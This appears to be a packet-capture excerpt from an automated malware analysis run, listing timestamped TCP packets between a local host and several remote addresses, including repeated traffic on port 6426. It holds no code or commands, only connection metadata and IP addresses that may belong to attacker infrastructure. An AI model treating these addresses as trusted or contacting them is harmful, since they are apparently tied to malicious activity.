                                                                                                                                          Dec 14, 2024 14:00:44.061177969 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.061199903 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.061259031 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.061300993 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.061300993 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.061338902 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.066756010 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.066787004 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.066843987 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.066860914 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.066874027 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.066896915 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.217130899 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.217176914 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.217317104 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.217361927 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.217444897 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.223834038 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.223856926 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.223917961 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.223944902 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.223990917 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.230741024 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.230762959 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.230827093 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.230854034 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.230909109 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.236172915 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.236193895 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.236258984 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.236284971 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.236327887 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.237622976 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.237687111 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.237699032 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.237755060 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.237778902 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.237796068 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.238451004 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.329530954 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:44.449518919 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.449613094 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:44.455974102 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:44.575670004 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:46.066842079 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:46.120410919 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:46.377185106 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:46.381392002 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:46.501327991 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:46.501564980 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:46.621423960 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:47.286983967 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:47.288455009 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:47.408211946 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:47.605355024 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:47.607897043 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:47.651680946 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:47.727782965 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:47.727894068 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:47.731786013 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:47.851557970 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:47.893209934 CET4972280192.168.2.12178.237.33.50
                                                                                                                                          Dec 14, 2024 14:00:48.013144970 CET8049722178.237.33.50192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:48.013341904 CET4972280192.168.2.12178.237.33.50
                                                                                                                                          Dec 14, 2024 14:00:48.013647079 CET4972280192.168.2.12178.237.33.50
                                                                                                                                          Dec 14, 2024 14:00:48.134224892 CET8049722178.237.33.50192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:49.266374111 CET8049722178.237.33.50192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:49.266513109 CET4972280192.168.2.12178.237.33.50
                                                                                                                                          Dec 14, 2024 14:00:49.279454947 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:49.337522984 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:49.386053085 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:49.399288893 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:49.640609026 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:49.644867897 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:49.765516043 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:49.765594959 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:49.885454893 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.272416115 CET8049722178.237.33.50192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.272516966 CET4972280192.168.2.12178.237.33.50
                                                                                                                                          Dec 14, 2024 14:00:50.546418905 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.546541929 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.546555996 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.546611071 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.546617985 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:50.546622992 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.546669006 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:50.815885067 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.815906048 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.815920115 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.815932035 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.815992117 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:50.816538095 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:50.818783045 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.818897009 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.818949938 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:50.827395916 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.827415943 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.827492952 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:50.836019993 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.836039066 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.836117029 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.059935093 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.059993982 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.060045004 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.064131021 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.064188004 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.064239025 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.072637081 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.072653055 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.072702885 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.080935955 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.080949068 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.081018925 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.089797020 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.089809895 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.089869022 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.097712040 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.097961903 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.098051071 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.106224060 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.106266022 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.106322050 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.251966953 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.292301893 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.316871881 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.316919088 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.316977978 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.320952892 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.321113110 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.321161032 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.329262972 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.329334021 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.329384089 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.337637901 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.337730885 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.337774992 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.345944881 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.345993042 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.346051931 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.354187012 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.354257107 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.354311943 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.362499952 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.362590075 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.362648010 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.370950937 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.371009111 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.371056080 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.379137039 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.379321098 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.379384995 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.387439013 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.432914972 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.573404074 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.573628902 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.573796034 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.577498913 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.579011917 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.579057932 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.579090118 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.583920002 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.583965063 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.584048033 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.592600107 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.592652082 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.592735052 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.600613117 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.600677967 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.600692987 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.608846903 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.608896017 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.608957052 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.617204905 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.617265940 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.617295980 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.625520945 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.625580072 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.625648022 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.633817911 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.633865118 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.633898973 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.642205954 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.642257929 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.642268896 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.650513887 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.650563002 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.650583029 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.658821106 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.658870935 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.658915043 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.667042971 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.667102098 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.830758095 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.830775023 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.830854893 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.833571911 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.833616972 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.833663940 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.838982105 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.839112043 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.839193106 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.844706059 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.844773054 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.844974995 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.850476980 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.850610971 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.850661993 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.856177092 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.856259108 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.856312990 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.861952066 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.862056971 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.862127066 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.867670059 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.867759943 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.867811918 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.873404980 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.873486996 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.873683929 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.879275084 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.879368067 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.879416943 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.884970903 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.885123014 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.885220051 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.890670061 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.890785933 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.890830994 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.896477938 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.896578074 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.896641016 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.902177095 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.902369022 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.902432919 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.907984972 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.908030033 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.908090115 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.913677931 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.913762093 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.913810968 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.919387102 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.919465065 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.919514894 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.925139904 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.979824066 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.090372086 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.090389967 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.090460062 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.091586113 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.091619968 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.091666937 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.094049931 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.094172001 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.094225883 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.098422050 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.098536015 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.098592997 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.102911949 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.103055954 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.103107929 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.107048035 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.107137918 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.107192039 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.111331940 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.111459970 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.111510992 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.115582943 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.115822077 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.115871906 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.119919062 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.120007038 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.120059013 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.124453068 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.124596119 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.124649048 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.128581047 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.128705025 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.128757954 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.132880926 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.133014917 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.133065939 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.137070894 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.137182951 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.137233019 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.141426086 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.141576052 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.141637087 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.145752907 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.145838976 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.145895004 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.150021076 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.150132895 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.150187016 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.154434919 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.154635906 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.154683113 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.158664942 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.158755064 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.158798933 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.163784027 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.163826942 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.163873911 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.167258978 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.167342901 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.167401075 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.171561003 CET642649721160.25.73.25192.168.2.12
